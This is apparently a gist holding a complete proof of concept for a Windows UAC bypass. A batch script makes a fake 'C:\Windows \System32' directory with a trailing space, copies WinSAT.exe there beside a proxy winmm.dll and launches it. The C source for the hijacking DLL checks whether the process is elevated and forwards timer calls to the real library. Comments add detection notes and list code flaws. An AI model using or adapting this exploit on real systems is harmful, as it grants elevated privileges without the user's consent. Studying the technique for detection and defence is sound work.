UAC bypass complete POC
rem Build the proxy winmm.dll from winmm.c (second file in this gist) with a static CRT.
cl /MT /LD winmm.c User32.lib Advapi32.lib
rem The "\\?\" prefix makes mkdir keep the trailing space in the name, so this creates a
rem second directory, "C:\Windows " (with a space), separate from the real C:\Windows.
rem Detection note: a "Windows " directory with a trailing space under C:\ has no legitimate origin.
mkdir "\\?\C:\Windows "
mkdir "\\?\C:\Windows \System32"
rem Artefacts a defender should alert on: a copy of a signed System32 binary placed outside
rem the real System32, side by side with an unsigned winmm.dll.
copy "C:\Windows\System32\WinSAT.exe" "C:\Windows \System32\"
copy "winmm.dll" "C:\Windows \System32\"
rem Launching the copy picks up the adjacent winmm.dll (presumably via the application-directory
rem step of the DLL search order - see the linked article); DllMain in winmm.c then runs.
"C:\Windows \System32\WinSAT.exe"
// See the article https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
// MMNOTIMER stops mmsystem.h (included via windows.h) from declaring the multimedia
// timer API, presumably so the timeBeginPeriod/timeEndPeriod definitions in this file
// do not collide with the SDK prototypes — confirm against the SDK's mmsystem.h.
#define MMNOTIMER
#include <windows.h>
// Handle to the genuine winmm.dll; set in DllMain on attach, released on detach.
static HMODULE winmm;
// Addresses of the real timer exports resolved with GetProcAddress in DllMain.
// The exported wrappers at the bottom of the file forward every call to these.
static MMRESULT (*timeBeginPeriod_real)(UINT uPeriod);
static MMRESULT (*timeEndPeriod_real)(UINT uPeriod);
/*
 * Entry point of the proxy winmm.dll.
 *
 * On DLL_PROCESS_ATTACH it shows a message box, queries whether the host
 * process token is elevated (and shows a second message box if so), then loads
 * the genuine winmm.dll from System32 and resolves the two timer exports that
 * this module forwards. On DLL_PROCESS_DETACH it frees that module handle.
 *
 * Review notes (code left as written):
 *  - The function is declared BOOL but falls off the end without a return
 *    statement, so the value the loader receives is undefined behaviour in C.
 *  - OpenProcessToken and GetTokenInformation results are not checked, and
 *    token_elevation is never initialised, so the TokenIsElevated test below
 *    reads indeterminate memory if the query fails.
 *  - Microsoft's DllMain guidance advises against LoadLibrary and UI calls
 *    inside DllMain (loader lock). The message boxes are also a loud, visible
 *    artefact of this DLL being loaded into a process.
 */
__declspec(dllexport)
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    /* Unused parameters. */
    (void) hinstDLL;
    (void) lpvReserved;
    if (fdwReason == DLL_PROCESS_ATTACH)
    {
        HANDLE token;
        TOKEN_ELEVATION token_elevation;
        DWORD token_elevation_size;
        MessageBoxW(NULL, L"DLL has been attached to the process", L"Hijacker", MB_OK);
        /* Query the current process token for its elevation state (return values unchecked). */
        OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token);
        token_elevation_size = sizeof(token_elevation);
        GetTokenInformation(token, TokenElevation, &token_elevation, sizeof(token_elevation), &token_elevation_size);
        CloseHandle(token);
        if (token_elevation.TokenIsElevated)
        {
            MessageBoxW(NULL, L"DLL is running within an elevated process", L"Hijacker", MB_OK);
        }
        /* Absolute path to the real library — presumably so the name does not
         * resolve back to this proxy module; confirm against the loader's search order. */
        winmm = LoadLibraryW(L"C:\\Windows\\System32\\winmm.dll");
        /* Resolve the real implementations the exported wrappers forward to.
         * NOTE(review): neither pointer is checked for NULL before the wrappers use it. */
        timeBeginPeriod_real = (MMRESULT (*)(UINT)) GetProcAddress(winmm, "timeBeginPeriod");
        timeEndPeriod_real = (MMRESULT (*)(UINT)) GetProcAddress(winmm, "timeEndPeriod");
    }
    else if (fdwReason == DLL_PROCESS_DETACH)
    {
        /* Release the handle taken by LoadLibraryW above. */
        FreeLibrary(winmm);
    }
}
// There is some bug here | |
/*
 * Exported forwarder for timeBeginPeriod.
 *
 * Hands the call, unchanged, to the genuine winmm.dll implementation whose
 * address DllMain stored in timeBeginPeriod_real, and returns its result.
 */
__declspec(dllexport)
MMRESULT WINAPI timeBeginPeriod(UINT uPeriod)
{
    MMRESULT (*forward)(UINT) = timeBeginPeriod_real;
    return forward(uPeriod);
}
/*
 * Exported forwarder for timeEndPeriod.
 *
 * Hands the call, unchanged, to the genuine winmm.dll implementation whose
 * address DllMain stored in timeEndPeriod_real, and returns its result.
 */
__declspec(dllexport)
MMRESULT WINAPI timeEndPeriod(UINT uPeriod)
{
    MMRESULT (*forward)(UINT) = timeEndPeriod_real;
    return forward(uPeriod);
}